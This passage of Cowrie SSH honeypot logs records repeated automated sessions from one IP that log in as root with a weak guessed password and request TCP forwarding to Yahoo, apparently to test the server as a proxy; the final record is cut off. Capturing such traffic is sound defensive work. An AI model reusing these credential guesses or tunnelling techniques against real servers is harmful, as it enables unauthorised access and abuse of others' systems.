{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6194,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1cd5aae8679","protocol":"ssh","message":"New connection: 213.209.150.239:6194 (1.2.3.4:22) [session: c1cd5aae8679]","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.963613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:50.964652Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.012094Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.247038Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":7427,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7427","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.295131Z","session":"c1cd5aae8679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.342225Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14207,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14207","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.477344Z","session":"c1cd5aae8679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.524446Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.572254Z","src_ip":"213.209.150.239","session":"c1cd5aae8679"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6240,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d081e5ddcba","protocol":"ssh","message":"New connection: 213.209.150.239:6240 (1.2.3.4:22) [session: 7d081e5ddcba]","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.628270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.628888Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.686017Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:51.968771Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26363,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26363","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.026700Z","session":"7d081e5ddcba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.083647Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6329,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6329","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.239236Z","session":"7d081e5ddcba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.296216Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.354371Z","src_ip":"213.209.150.239","session":"7d081e5ddcba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6291,"dst_ip":"1.2.3.4","dst_port":22,"session":"ede7065618c5","protocol":"ssh","message":"New connection: 213.209.150.239:6291 (1.2.3.4:22) [session: ede7065618c5]","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.400136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.401240Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.448557Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.683501Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12947,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12947","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.731433Z","session":"ede7065618c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.778871Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27459,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27459","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.913626Z","session":"ede7065618c5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:52.961297Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.009346Z","src_ip":"213.209.150.239","session":"ede7065618c5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6339,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ad05e5b668","protocol":"ssh","message":"New connection: 213.209.150.239:6339 (1.2.3.4:22) [session: 70ad05e5b668]","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.055254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.055910Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.102997Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.337069Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":507,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:507","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.384984Z","session":"70ad05e5b668"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.432756Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":14301,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14301","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.569560Z","session":"70ad05e5b668"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.616856Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.665032Z","src_ip":"213.209.150.239","session":"70ad05e5b668"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6383,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3315bae6d2","protocol":"ssh","message":"New connection: 213.209.150.239:6383 (1.2.3.4:22) [session: 6f3315bae6d2]","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.711328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.712063Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.759282Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:53.994182Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":16912,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16912","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.042243Z","session":"6f3315bae6d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.089555Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":24954,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24954","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.225764Z","session":"6f3315bae6d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.273133Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.321030Z","src_ip":"213.209.150.239","session":"6f3315bae6d2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6429,"dst_ip":"1.2.3.4","dst_port":22,"session":"267b8e81a4df","protocol":"ssh","message":"New connection: 213.209.150.239:6429 (1.2.3.4:22) [session: 267b8e81a4df]","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.367139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.367792Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-c